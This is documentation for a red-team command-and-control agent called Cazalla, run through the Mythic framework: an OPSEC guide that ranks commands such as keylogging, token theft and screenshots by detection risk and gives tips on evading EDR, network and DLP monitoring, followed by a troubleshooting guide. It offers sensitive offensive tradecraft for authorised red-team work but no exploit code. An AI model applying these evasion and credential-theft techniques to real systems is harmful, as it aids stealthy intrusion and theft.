Operational Security (OPSEC) is critical when conducting red team operations. Cazalla includes built-in OPSEC checking to help operators make informed decisions and avoid accidental security violations.
|
||||
|
||||
### Key Principles
|
||||
|
||||
1. **Minimize Detection**: Avoid commands and behaviors that trigger security alerts
|
||||
2. **Use Built-in Commands**: Prefer Cazalla's native commands over `shell` when possible
|
||||
3. **Monitor Artifacts**: Review artifacts created by commands
|
||||
4. **Review OPSEC Warnings**: Always read and understand OPSEC popup messages
|
||||
5. **Operational Timing**: Adjust sleep intervals and jitter based on operational needs
|
||||
|
||||
---
|
||||
|
||||
## OPSEC Checking System
|
||||
|
||||
Cazalla implements a two-stage OPSEC checking system:
|
||||
|
||||
### OPSEC Pre-Check (`opsec_pre`)
|
||||
|
||||
Runs **before** task creation and can block execution:
|
||||
|
||||
- **Blocking**: Can set `OpsecPreBlocked=True` to prevent task execution
|
||||
- **Warning**: Can provide detailed warnings without blocking
|
||||
- **Bypass Roles**: Defines who can approve blocked tasks:
|
||||
- `operator`: Any operator can bypass
|
||||
- `other_operator`: Requires approval from a different operator
|
||||
- `lead`: Only operation lead can approve
|
||||
|
||||
### OPSEC Post-Check (`opsec_post`)
|
||||
|
||||
Runs **after** task creation but **before** agent execution:
|
||||
|
||||
- **Artifact Review**: Warns about artifacts that will be created
|
||||
- **Final Warning**: Last chance to cancel before agent picks up task
|
||||
- **Context-Aware**: Reviews artifacts generated by `create_tasking`
|
||||
|
||||
---
|
||||
|
||||
## Command Risk Assessment
|
||||
|
||||
### 🔴 CRITICAL OPSEC RISK
|
||||
|
||||
These commands are **extremely detectable** and should be used with extreme caution:
|
||||
|
||||
| Command | Risk Level | Detection Likelihood | Alternatives |
|
||||
|---------|-----------|---------------------|--------------|
|
||||
| `keylog_start` | CRITICAL | Minutes to hours | Credential theft, browser credential extraction, clipboard monitoring |
|
||||
| `steal_token` (LSASS) | CRITICAL | High-priority alerts | `make_token` for domain credentials |
|
||||
| `kill` (critical PIDs) | CRITICAL | System instability | Blocked for PIDs 0, 4, 8 |
|
||||
|
||||
### 🟠 HIGH OPSEC RISK
|
||||
|
||||
These commands are **highly detectable** and require careful consideration:
|
||||
|
||||
| Command | Risk Level | Detection Likelihood | Alternatives |
|
||||
|---------|-----------|---------------------|--------------|
|
||||
| `shell` | HIGH | High (cmd.exe spawn) | Use built-in Cazalla commands when possible |
|
||||
| `steal_token` | HIGH | High (EDR/XDR monitoring) | `make_token` when credentials available |
|
||||
| `rm` (system files) | HIGH | Blocked for safety | Never delete system files |
|
||||
| `screenshot` | HIGH | Screen capture detection | Use sparingly, consider timing |
|
||||
|
||||
### 🟡 MEDIUM OPSEC RISK
|
||||
|
||||
These commands have **moderate detection risk**:
|
||||
|
||||
| Command | Risk Level | Detection Likelihood | Notes |
|
||||
|---------|-----------|---------------------|-------|
|
||||
| `download` | MEDIUM | File access logging | Large files may trigger DLP |
|
||||
| `upload` | MEDIUM | File write detection | Suspicious extensions monitored |
|
||||
| `socks` | MEDIUM | Network traffic analysis | High bandwidth usage |
|
||||
| `rpfwd` | MEDIUM | Network connection monitoring | Persistent connections |
|
||||
| `make_token` | MEDIUM | Authentication logging | Less detectable than `steal_token` |
|
||||
|
||||
### 🟢 LOW OPSEC RISK
|
||||
|
||||
These commands have **low detection risk**:
|
||||
|
||||
| Command | Risk Level | Detection Likelihood | Notes |
|
||||
|---------|-----------|---------------------|-------|
|
||||
| `ls`, `cd`, `pwd` | LOW | Minimal | Read-only operations |
|
||||
| `cat` | LOW | File read logging | May detect credential extraction |
|
||||
| `ps` | LOW | Process enumeration | May be logged but low priority |
|
||||
| `whoami` | LOW | Minimal | No system modifications |
|
||||
| `list_tokens` | LOW | Token enumeration | Lower risk than token theft |
|
||||
|
||||
---
|
||||
|
||||
## Detection Avoidance
|
||||
|
||||
### EDR/XDR Detection
|
||||
|
||||
**Endpoint Detection and Response (EDR)** and **Extended Detection and Response (XDR)** solutions monitor:
|
||||
|
||||
- **Process Creation**: `shell` command spawns `cmd.exe` (highly monitored)
|
||||
- **Token Manipulation**: `steal_token` and `make_token` generate authentication events
|
||||
- **Memory Access**: Accessing LSASS memory triggers high-priority alerts
|
||||
- **API Hooking**: Keyloggers and screen capture use monitored APIs
|
||||
- **File Operations**: File writes to sensitive locations trigger alerts
|
||||
|
||||
**Mitigation Strategies:**
|
||||
- Use built-in Cazalla commands instead of `shell` when possible
|
||||
- Prefer `make_token` over `steal_token` when credentials are available
|
||||
- Avoid accessing LSASS or other critical system processes
|
||||
- Use keylogging only when absolutely necessary
|
||||
- Limit file operations to user directories when possible
|
||||
|
||||
### Network Monitoring
|
||||
|
||||
**Network Intrusion Detection Systems (NIDS)** and firewalls monitor:
|
||||
|
||||
- **SOCKS Proxies**: Continuous network traffic patterns
|
||||
- **Reverse Port Forwarding**: Persistent connections and port listeners
|
||||
- **Large File Transfers**: High bandwidth usage
|
||||
- **Suspicious Ports**: Non-standard ports may be flagged
|
||||
|
||||
**Mitigation Strategies:**
|
||||
- Use non-standard ports for SOCKS and RPFWD
|
||||
- Limit bandwidth usage during file transfers
|
||||
- Use appropriate sleep intervals to reduce network activity
|
||||
- Consider operational timing (e.g., during business hours)
|
||||
|
||||
### Behavioral Analysis
|
||||
|
||||
**Behavioral analysis engines** monitor:
|
||||
|
||||
- **Timing Patterns**: Predictable beacon intervals
|
||||
- **Command Sequences**: Common attack patterns
|
||||
- **Anomalous Activity**: Unusual system behavior
|
||||
|
||||
**Mitigation Strategies:**
|
||||
- Use jitter (10-30%) to randomize sleep intervals
|
||||
- Vary command execution patterns
|
||||
- Avoid executing commands in rapid succession
|
||||
- Use appropriate sleep intervals (30-60 seconds for stealth)
|
||||
|
||||
### Data Loss Prevention (DLP)
|
||||
|
||||
**DLP systems** monitor:
|
||||
|
||||
- **File Access**: Reading sensitive files (SAM, configs, etc.)
|
||||
- **File Transfers**: Large downloads/uploads
|
||||
- **Screen Capture**: Screenshot detection
|
||||
- **Credential Extraction**: Detecting credential theft patterns
|
||||
|
||||
**Mitigation Strategies:**
|
||||
- Limit access to sensitive files
|
||||
- Use chunked transfers for large files
|
||||
- Use screenshots sparingly
|
||||
- Consider operational timing for sensitive operations
|
||||
|
||||
---
|
||||
|
||||
## Best Practices
|
||||
|
||||
### 1. Use Built-in Commands
|
||||
|
||||
**❌ Avoid:**
|
||||
```
|
||||
shell whoami
|
||||
shell tasklist
|
||||
shell dir
|
||||
```
|
||||
|
||||
**✅ Prefer:**
|
||||
```
|
||||
whoami
|
||||
ps
|
||||
ls
|
||||
```
|
||||
|
||||
Built-in Cazalla commands:
|
||||
- Don't spawn `cmd.exe` (highly monitored)
|
||||
- Have better OPSEC characteristics
|
||||
- Provide structured output
|
||||
- Integrate with Mythic UI features
|
||||
|
||||
### 2. Adjust Sleep Intervals
|
||||
|
||||
**Initial Deployment:**
|
||||
- Use 30-60 seconds with 10-30% jitter
|
||||
- Provides good balance between responsiveness and stealth
|
||||
|
||||
**Interactive Operations:**
|
||||
- Reduce to 5-10 seconds with 10-20% jitter
|
||||
- Only when needed for responsive interaction
|
||||
|
||||
**Stealth Mode:**
|
||||
- Increase to 60-120 seconds with 20-40% jitter
|
||||
- Minimizes network activity and detection risk
|
||||
|
||||
### 3. Review OPSEC Warnings
|
||||
|
||||
**Always:**
|
||||
- Read OPSEC popup messages carefully
|
||||
- Understand the risks before approving
|
||||
- Consider alternatives when suggested
|
||||
- Consult with team lead for critical operations
|
||||
|
||||
**Never:**
|
||||
- Ignore OPSEC warnings
|
||||
- Bypass warnings without understanding risks
|
||||
- Execute critical commands without approval
|
||||
|
||||
### 4. Monitor Artifacts
|
||||
|
||||
**Regularly:**
|
||||
- Review artifacts created by commands
|
||||
- Check the Artifacts page in Mythic UI
|
||||
- Identify patterns that might trigger alerts
|
||||
- Clean up artifacts when possible
|
||||
|
||||
### 5. Limit High-Risk Operations
|
||||
|
||||
**Critical Operations:**
|
||||
- `keylog_start`: Use only when absolutely necessary
|
||||
- `steal_token` (LSASS): Prefer `make_token` when possible
|
||||
- `shell`: Use only when no alternative exists
|
||||
- `screenshot`: Use sparingly and consider timing
|
||||
|
||||
**Timing Considerations:**
|
||||
- Execute high-risk operations during low-activity periods
|
||||
- Avoid simultaneous high-risk operations
|
||||
- Space out operations to reduce detection correlation
|
||||
|
||||
### 6. Use Token Operations Wisely
|
||||
|
||||
**Best Practices:**
|
||||
- Prefer `make_token` over `steal_token` when credentials are available
|
||||
- Use `rev2self` after completing privileged operations
|
||||
- Limit token impersonation duration
|
||||
- Verify token context with `whoami` before operations
|
||||
|
||||
### 7. File Operations
|
||||
|
||||
**Best Practices:**
|
||||
- Use user directories for staging files
|
||||
- Avoid writing to System32, Windows, Program Files
|
||||
- Use relative paths when possible
|
||||
- Clean up temporary files after operations
|
||||
|
||||
---
|
||||
|
||||
## OPSEC by Command
|
||||
|
||||
### File System Commands
|
||||
|
||||
#### `ls`, `cd`, `pwd`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Minimal, read-only operations
|
||||
- **Best Practice**: Use freely for navigation
|
||||
|
||||
#### `cat`
|
||||
- **Risk**: LOW (operation), MEDIUM (credential detection)
|
||||
- **Detection**: File read logging, credential extraction detection
|
||||
- **Best Practice**: Use for reading files, be aware of credential detection
|
||||
|
||||
#### `download`
|
||||
- **Risk**: MEDIUM
|
||||
- **Detection**: File access logging, DLP for large files
|
||||
- **Best Practice**: Use chunked transfers, limit file sizes, avoid sensitive files
|
||||
|
||||
#### `upload`
|
||||
- **Risk**: MEDIUM
|
||||
- **Detection**: File write detection, suspicious extensions monitored
|
||||
- **Best Practice**: Avoid sensitive locations, use non-suspicious extensions when possible
|
||||
|
||||
#### `cp`, `mkdir`, `rm`
|
||||
- **Risk**: LOW (user directories), HIGH (system files)
|
||||
- **Detection**: File write/delete logging, blocked for system files
|
||||
- **Best Practice**: Use in user directories, never delete system files
|
||||
|
||||
### Process Management Commands
|
||||
|
||||
#### `ps`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Process enumeration may be logged
|
||||
- **Best Practice**: Use freely for reconnaissance
|
||||
|
||||
#### `kill`
|
||||
- **Risk**: HIGH (critical PIDs), MEDIUM (user processes)
|
||||
- **Detection**: Process termination logging, blocked for critical PIDs
|
||||
- **Best Practice**: Never kill critical system processes
|
||||
|
||||
### Token Operations
|
||||
|
||||
#### `list_tokens`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Token enumeration may be logged
|
||||
- **Best Practice**: Use for reconnaissance before token theft
|
||||
|
||||
#### `steal_token`
|
||||
- **Risk**: CRITICAL (LSASS), HIGH (other processes)
|
||||
- **Detection**: High-priority alerts, especially for LSASS
|
||||
- **Best Practice**: Always requires approval, prefer `make_token` when possible
|
||||
|
||||
#### `make_token`
|
||||
- **Risk**: MEDIUM
|
||||
- **Detection**: Authentication event logging
|
||||
- **Best Practice**: Less detectable than `steal_token`, use when credentials available
|
||||
|
||||
#### `rev2self`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Minimal
|
||||
- **Best Practice**: Use after completing privileged operations
|
||||
|
||||
### Network Tunneling
|
||||
|
||||
#### `socks`
|
||||
- **Risk**: MEDIUM
|
||||
- **Detection**: Continuous network traffic, flow analysis
|
||||
- **Best Practice**: Use non-standard ports, limit bandwidth, be aware of high traffic
|
||||
|
||||
#### `rpfwd`
|
||||
- **Risk**: MEDIUM
|
||||
- **Detection**: Persistent connections, port listeners
|
||||
- **Best Practice**: Avoid privileged ports, consider operational timing
|
||||
|
||||
### System Operations
|
||||
|
||||
#### `shell`
|
||||
- **Risk**: HIGH
|
||||
- **Detection**: cmd.exe spawn is highly monitored
|
||||
- **Best Practice**: Use only when no alternative exists, always requires approval
|
||||
|
||||
#### `screenshot`
|
||||
- **Risk**: HIGH
|
||||
- **Detection**: Screen capture detection, behavioral analysis
|
||||
- **Best Practice**: Use sparingly, consider timing, large screenshots may trigger alerts
|
||||
|
||||
#### `keylog_start`
|
||||
- **Risk**: CRITICAL
|
||||
- **Detection**: Extremely detectable, likely within minutes or hours
|
||||
- **Best Practice**: Use only when absolutely necessary, always requires lead approval
|
||||
|
||||
### Control Commands
|
||||
|
||||
#### `sleep`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Timing analysis for predictable patterns
|
||||
- **Best Practice**: Use jitter (10-30%) to randomize intervals
|
||||
|
||||
#### `exit`
|
||||
- **Risk**: LOW
|
||||
- **Detection**: Minimal
|
||||
- **Best Practice**: Use when agent removal is required
|
||||
|
||||
---
|
||||
|
||||
## OPSEC Warning Examples
|
||||
|
||||
### Blocking Message (shell whoami)
|
||||
|
||||
```
|
||||
🚨 OPSEC BLOCKED - Command Has Safer Alternative
|
||||
|
||||
This command contains operations that have safer built-in alternatives in Cazalla:
|
||||
|
||||
🚨 whoami: Use Cazalla's 'whoami' command instead (no cmd.exe spawn)
|
||||
|
||||
⚠️ cmd.exe spawn: This command would spawn cmd.exe (highly detectable)
|
||||
|
||||
💡 SAFER ALTERNATIVES:
|
||||
→ Use: 'whoami' (Cazalla built-in, no cmd.exe)
|
||||
|
||||
⚠️ TO PROCEED: You need approval from another operator.
|
||||
```
|
||||
|
||||
### Blocking Message (steal_token)
|
||||
|
||||
```
|
||||
🚨 HIGH OPSEC RISK - Token Theft Operation
|
||||
|
||||
Token theft operations are EXTREMELY monitored by:
|
||||
• EDR/XDR solutions (high-priority alerts)
|
||||
• Security Information and Event Management (SIEM)
|
||||
• Behavioral analysis engines
|
||||
• Process monitoring tools
|
||||
|
||||
⚠️ WARNING: Stealing tokens from critical processes (LSASS, System) will trigger
|
||||
immediate high-priority security alerts.
|
||||
|
||||
💡 ALTERNATIVES:
|
||||
→ Use 'make_token' if you have domain credentials (less detectable)
|
||||
→ Use 'list_tokens' first to identify high-value tokens
|
||||
→ Consider alternative privilege escalation methods
|
||||
|
||||
⚠️ TO PROCEED: You need approval from another operator.
|
||||
```
|
||||
|
||||
### Blocking Message (keylog_start)
|
||||
|
||||
```
|
||||
🚨 CRITICAL OPSEC RISK - Keylogger Operation
|
||||
|
||||
Keyloggers are EXTREMELY detectable by:
|
||||
• EDR/XDR solutions
|
||||
• Anti-malware engines
|
||||
• Behavioral analysis
|
||||
• API hooking detection
|
||||
|
||||
⚠️ WARNING: Detection is likely within MINUTES or HOURS.
|
||||
|
||||
💡 ALTERNATIVES:
|
||||
→ Credential theft (LSASS dumping, token theft)
|
||||
→ Browser credential extraction
|
||||
→ Clipboard monitoring
|
||||
→ Network credential interception
|
||||
|
||||
⚠️ TO PROCEED: You need approval from a lead operator.
|
||||
```
|
||||
|
||||
---
|
||||
|
||||
## Related Documentation
|
||||
|
||||
- [Commands Reference](commands.md) - Detailed command documentation with OPSEC notes
|
||||
- [Features Overview](features.md#opsec-checking) - OPSEC checking system details
|
||||
- [Getting Started](getting-started.md#security-considerations) - Security best practices
|
||||
- [Usage Examples](examples.md) - OPSEC-aware examples
|
||||
|
||||
---
|
||||
|
||||
**Remember**: OPSEC is a shared responsibility. Always review warnings, understand risks, and consult with your team before executing high-risk operations.
|
||||
|
||||
**Last Updated:** 2024
|
||||
|
||||
@@ -0,0 +1,635 @@
|
||||
+++
|
||||
title = "Troubleshooting"
|
||||
chapter = false
|
||||
weight = 10
|
||||
pre = "6. "
|
||||
+++
|
||||
|
||||
# Cazalla Troubleshooting Guide
|
||||
|
||||
This guide helps you diagnose and resolve common issues when using Cazalla agent.
|
||||
|
||||
## 📋 Table of Contents
|
||||
|
||||
- [Agent Connection Issues](#agent-connection-issues)
|
||||
- [Command Execution Problems](#command-execution-problems)
|
||||
- [File Operations Issues](#file-operations-issues)
|
||||
- [Process Management Issues](#process-management-issues)
|
||||
- [Token Operations Issues](#token-operations-issues)
|
||||
- [Network Tunneling Issues](#network-tunneling-issues)
|
||||
- [Build and Compilation Issues](#build-and-compilation-issues)
|
||||
- [Mythic UI Integration Issues](#mythic-ui-integration-issues)
|
||||
- [General Debugging](#general-debugging)
|
||||
|
||||
---
|
||||
|
||||
## Agent Connection Issues
|
||||
|
||||
### Agent Not Connecting to Mythic
|
||||
|
||||
**Symptoms:**
|
||||
- Agent shows no connection in Mythic UI
|
||||
- No callback appears after executing agent
|
||||
- Agent appears to hang or exit immediately
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Network Connectivity**
|
||||
```bash
|
||||
# From target machine
|
||||
ping <mythic_server_ip>
|
||||
curl https://<mythic_server>:443
|
||||
```
|
||||
|
||||
2. **Check C2 Profile**
|
||||
- Verify C2 profile is active in Mythic
|
||||
- Check that port matches callback configuration
|
||||
- Review C2 profile logs
|
||||
|
||||
3. **Check Agent Execution**
|
||||
```cmd
|
||||
# On Windows target
|
||||
tasklist | findstr cazalla
|
||||
# Should show cazalla.exe process
|
||||
```
|
||||
|
||||
4. **Check Mythic Logs**
|
||||
```bash
|
||||
# On Mythic server
|
||||
sudo docker logs mythic_server
|
||||
sudo docker logs cazalla_translator
|
||||
```
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Network Issues**: Verify firewall rules, check routing
|
||||
- **C2 Profile Issues**: Rebuild payload with correct C2 profile
|
||||
- **Port Issues**: Verify port is open and accessible
|
||||
- **Agent Execution**: Check Windows Event Logs for errors
|
||||
|
||||
---
|
||||
|
||||
## Command Execution Problems
|
||||
|
||||
### Commands Not Executing
|
||||
|
||||
**Symptoms:**
|
||||
- Task stays in "Processing" state
|
||||
- No output returned
|
||||
- Command appears to hang
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Verify Agent is Active**
|
||||
- Check callback status (should be green)
|
||||
- Verify last check-in time
|
||||
- Check agent is not sleeping
|
||||
|
||||
2. **Check Command Syntax**
|
||||
- Review command documentation in [Commands Reference](commands.md)
|
||||
- Verify parameter format (JSON vs string)
|
||||
- Check for typos
|
||||
|
||||
3. **Review Task Output**
|
||||
- Check task output for error messages
|
||||
- Look for specific error codes
|
||||
- Review translator logs
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Syntax Errors**: Correct command syntax
|
||||
- **Parameter Issues**: Verify parameter format
|
||||
- **Agent Issues**: Restart agent if needed
|
||||
|
||||
### Commands Return Errors
|
||||
|
||||
**Symptoms:**
|
||||
- Commands return error messages
|
||||
- Windows error codes (e.g., "Error: Code 2")
|
||||
- Access denied errors
|
||||
|
||||
**Common Errors:**
|
||||
|
||||
#### Error Code 2 (ERROR_FILE_NOT_FOUND)
|
||||
```
|
||||
Error: No se pudo abrir el archivo. Código: 2
|
||||
```
|
||||
|
||||
**Solution:**
|
||||
- Verify file path is correct
|
||||
- Check file exists
|
||||
- Use absolute paths if relative paths fail
|
||||
- Check current working directory with `pwd`
|
||||
|
||||
#### Error Code 5 (ERROR_ACCESS_DENIED)
|
||||
```
|
||||
Error: Acceso denegado. Código: 5
|
||||
```
|
||||
|
||||
**Solution:**
|
||||
- Verify permissions
|
||||
- Use `whoami` to check current context
|
||||
- Try token impersonation for elevated privileges
|
||||
- Check file/directory permissions
|
||||
|
||||
#### Error Code 123 (ERROR_INVALID_NAME)
|
||||
```
|
||||
Error: Nombre de archivo inválido. Código: 123
|
||||
```
|
||||
|
||||
**Solution:**
|
||||
- Check path for invalid characters
|
||||
- Verify path syntax is correct
|
||||
- Use proper path separators (`\` or `/`)
|
||||
- Check for null bytes or control characters
|
||||
|
||||
---
|
||||
|
||||
## File Operations Issues
|
||||
|
||||
### File Not Found Errors
|
||||
|
||||
**Symptoms:**
|
||||
- `cat`, `download`, `cp` fail with "file not found"
|
||||
- Relative paths don't work
|
||||
|
||||
**Solution:**
|
||||
|
||||
```bash
|
||||
# Check current directory
|
||||
pwd
|
||||
|
||||
# Use absolute paths
|
||||
cat C:\Users\Administrator\Desktop\file.txt
|
||||
|
||||
# Or change directory first
|
||||
cd C:\Users\Administrator\Desktop
|
||||
cat file.txt
|
||||
```
|
||||
|
||||
### Download/Upload Fails
|
||||
|
||||
**Symptoms:**
|
||||
- Download/upload commands fail
|
||||
- Large files fail to transfer
|
||||
- Chunks not received
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check File Size**
|
||||
- Files up to 2GB are supported
|
||||
- Very large files may timeout
|
||||
|
||||
2. **Check Network**
|
||||
- Verify stable connection
|
||||
- Check for network interruptions
|
||||
|
||||
3. **Check Logs**
|
||||
```bash
|
||||
sudo docker logs cazalla_translator | grep -i download
|
||||
sudo docker logs cazalla_translator | grep -i upload
|
||||
```
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Large Files**: Use smaller chunk sizes (requires code modification)
|
||||
- **Network Issues**: Retry operation
|
||||
- **Timeout Issues**: Increase sleep interval temporarily
|
||||
|
||||
### Path Normalization Issues
|
||||
|
||||
**Symptoms:**
|
||||
- Double backslashes in paths
|
||||
- Paths not resolving correctly
|
||||
|
||||
**Solution:**
|
||||
|
||||
Cazalla automatically normalizes paths, but if issues persist:
|
||||
- Use single backslashes: `C:\Users\file.txt`
|
||||
- Use forward slashes: `C:/Users/file.txt`
|
||||
- Avoid double backslashes: `C:\\Users\\file.txt` (will be normalized automatically)
|
||||
|
||||
---
|
||||
|
||||
## Process Management Issues
|
||||
|
||||
### Process Browser Not Showing Processes
|
||||
|
||||
**Symptoms:**
|
||||
- Processes don't appear in Process Browser UI
|
||||
- Process list is empty
|
||||
- Processes show as "UNKNOWN - MISSING DATA"
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Verify `ps` Command Executed**
|
||||
- Check callback output for `ps` command
|
||||
- Verify command completed successfully
|
||||
|
||||
2. **Check Translator Logs**
|
||||
```bash
|
||||
sudo docker logs cazalla_translator | grep -i process
|
||||
```
|
||||
|
||||
3. **Verify Process Browser Integration**
|
||||
- Check `ps.py` has `supported_ui_features = ["process_browser:list"]`
|
||||
- Rebuild translator if changes were made
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Rebuild Translator**: `sudo ./mythic-cli build cazalla`
|
||||
- **Check Process Parsing**: Verify translator is parsing process list correctly
|
||||
- **Check Permissions**: Some processes may require elevated privileges
|
||||
|
||||
### Kill Command Fails
|
||||
|
||||
**Symptoms:**
|
||||
- `kill` command returns error
|
||||
- Process not terminated
|
||||
- Access denied errors
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Process Exists**
|
||||
```bash
|
||||
ps
|
||||
# Verify PID exists
|
||||
```
|
||||
|
||||
2. **Check Permissions**
|
||||
- Verify current user context with `whoami`
|
||||
- Some processes require elevated privileges
|
||||
|
||||
3. **Check Critical PIDs**
|
||||
- PIDs 0, 4, 8 are blocked for safety
|
||||
- These cannot be killed
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Permission Issues**: Use token impersonation for elevated privileges
|
||||
- **Critical PIDs**: These are intentionally blocked
|
||||
- **Protected Processes**: May require SYSTEM privileges
|
||||
|
||||
---
|
||||
|
||||
## Token Operations Issues
|
||||
|
||||
### Token Theft Fails
|
||||
|
||||
**Symptoms:**
|
||||
- `steal_token` returns error
|
||||
- Access denied errors
|
||||
- Process not found errors
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Process Exists**
|
||||
```bash
|
||||
ps
|
||||
# Verify PID exists
|
||||
```
|
||||
|
||||
2. **Check Permissions**
|
||||
- Verify current user context
|
||||
- Some processes require `SeDebugPrivilege`
|
||||
|
||||
3. **Check Process Access**
|
||||
- Protected processes may require elevated privileges
|
||||
- Session 0 processes require SYSTEM privileges
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Permission Issues**: Use `make_token` to create SYSTEM token first
|
||||
- **Protected Processes**: May require SYSTEM privileges
|
||||
- **Session Issues**: Verify process is in accessible session
|
||||
|
||||
### Token Impersonation Not Working
|
||||
|
||||
**Symptoms:**
|
||||
- `whoami` shows original user after `steal_token`
|
||||
- Commands don't run with stolen token privileges
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Verify Token Theft**
|
||||
```bash
|
||||
steal_token <PID>
|
||||
whoami
|
||||
# Should show impersonated user
|
||||
```
|
||||
|
||||
2. **Check Token Selection**
|
||||
- Verify token is selected in Mythic UI dropdown
|
||||
- Check translator logs for token_id inclusion
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Verify Impersonation**: Use `whoami` after `steal_token`
|
||||
- **Token Selection**: Select token from dropdown in Mythic UI
|
||||
- **Token Registration**: Verify token is registered as `callback_token`
|
||||
|
||||
---
|
||||
|
||||
## Network Tunneling Issues
|
||||
|
||||
### SOCKS Proxy Not Working
|
||||
|
||||
**Symptoms:**
|
||||
- SOCKS proxy doesn't accept connections
|
||||
- Connections timeout
|
||||
- Data doesn't flow
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Port is Open**
|
||||
```bash
|
||||
sudo netstat -tlnp | grep 7002
|
||||
# Should show port listening
|
||||
```
|
||||
|
||||
2. **Check Mythic Configuration**
|
||||
```bash
|
||||
grep DYNAMIC_PORTS_BIND_LOCALHOST_ONLY ~/Mythic/.env
|
||||
# Should be "false" for external access
|
||||
```
|
||||
|
||||
3. **Check Agent Status**
|
||||
- Verify agent is active
|
||||
- Check agent is not sleeping
|
||||
- Verify SOCKS command executed successfully
|
||||
|
||||
4. **Check Translator Logs**
|
||||
```bash
|
||||
sudo docker logs cazalla_translator | grep -i socks
|
||||
```
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Port Not Accessible**: Configure Mythic to bind on all interfaces
|
||||
- **Connection Timeout**: Verify agent is active and not sleeping
|
||||
- **Data Flow Issues**: Check translator logs for SOCKS block processing
|
||||
|
||||
### Reverse Port Forwarding Not Working
|
||||
|
||||
**Symptoms:**
|
||||
- RPFWD listener doesn't start
|
||||
- Connections don't forward
|
||||
- Port binding fails
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Port Binding**
|
||||
- Verify port is not already in use
|
||||
- Check for permission issues (privileged ports require admin)
|
||||
|
||||
2. **Check Agent Logs**
|
||||
- Look for RPFWD start messages
|
||||
- Check for binding errors
|
||||
|
||||
3. **Verify Connection**
|
||||
```bash
|
||||
# From another machine or agent host
|
||||
nc -nzv <agent_ip> 8080
|
||||
```
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Port in Use**: Use different port
|
||||
- **Permission Issues**: Use non-privileged ports (>=1024)
|
||||
- **Connection Issues**: Verify network routing
|
||||
|
||||
---
|
||||
|
||||
## Build and Compilation Issues
|
||||
|
||||
### Build Fails
|
||||
|
||||
**Symptoms:**
|
||||
- Payload build fails in Mythic UI
|
||||
- Compilation errors
|
||||
- Docker build errors
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Docker**
|
||||
```bash
|
||||
sudo docker ps
|
||||
sudo docker logs cazalla_translator
|
||||
```
|
||||
|
||||
2. **Check Build Parameters**
|
||||
- Verify all required parameters are set
|
||||
- Check parameter format (JSON vs string)
|
||||
|
||||
3. **Check Build Logs**
|
||||
- Review build output in Mythic UI
|
||||
- Check for specific error messages
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Docker Issues**: Restart Docker and Mythic
|
||||
- **Parameter Issues**: Verify build parameters
|
||||
- **Code Issues**: Check for syntax errors in C code
|
||||
|
||||
### Encryption Not Working
|
||||
|
||||
**Symptoms:**
|
||||
- Encryption not enabled
|
||||
- HMAC verification failed errors
|
||||
- Messages not encrypting/decrypting
|
||||
|
||||
**Diagnosis:**
|
||||
|
||||
1. **Check Build Parameters**
|
||||
- Verify `AESPSK` parameter is configured
|
||||
- Check `crypto_type` is set to `aes256_hmac`
|
||||
|
||||
2. **Check Build Output**
|
||||
- Look for: `✓ Encryption ENABLED`
|
||||
- Verify encryption key is present
|
||||
|
||||
3. **Check Translator Logs**
|
||||
```bash
|
||||
sudo docker logs cazalla_translator | grep -i crypto
|
||||
```
|
||||
|
||||
**Solutions:**
|
||||
|
||||
- **Encryption Not Enabled**: Rebuild with `AESPSK` parameter
|
||||
- **HMAC Errors**: Rebuild payload to regenerate encryption key
|
||||
- **Key Mismatch**: Verify agent and translator use same payload UUID
|
||||
|
||||
---
|
||||
|
||||
## Mythic UI Integration Issues
|
||||
|
||||
### Process Browser Not Updating
|
||||
|
||||
**Symptoms:**
|
||||
- Processes don't appear in Process Browser
|
||||
- Process list is stale
|
||||
- Processes show incorrect data
|
||||
|
||||
**Solutions:**
|
||||
|
||||
1. **Execute `ps` Command**
|
||||
```bash
|
||||
ps
|
||||
# This updates Process Browser
|
||||
```
|
||||
|
||||
2. **Clear Cache**
|
||||
- Process Browser cache is cleared automatically
|
||||
- Verify `update_deleted=True` is set in translator
|
||||
|
||||
3. **Rebuild Translator**
|
||||
```bash
|
||||
sudo ./mythic-cli build cazalla
|
||||
```
|
||||
|
||||
### File Browser Not Working
|
||||
|
||||
**Symptoms:**
|
||||
- Files don't appear in File Browser
|
||||
- File operations fail from UI
|
||||
- Paths not resolving
|
||||
|
||||
**Solutions:**
|
||||
|
||||
1. **Execute `ls` Command**
|
||||
```bash
|
||||
ls
|
||||
# This updates File Browser
|
||||
```
|
||||
|
||||
2. **Check Path Resolution**
|
||||
- Verify relative paths work
|
||||
- Use absolute paths if needed
|
||||
|
||||
3. **Check File Operations**
|
||||
- Verify file operations work from command line
|
||||
- Check permissions
|
||||
|
||||
### Context Tabs Not Updating
|
||||
|
||||
**Symptoms:**
|
||||
- Current directory not showing
|
||||
- Impersonation context not updating
|
||||
- Context tabs missing
|
||||
|
||||
**Solutions:**
|
||||
|
||||
1. **Verify Context Updates**
|
||||
```bash
|
||||
cd C:\Users
|
||||
# Should update cwd tab
|
||||
|
||||
steal_token <PID>
|
||||
# Should update impersonation_context tab
|
||||
```
|
||||
|
||||
2. **Check Translator Logs**
|
||||
```bash
|
||||
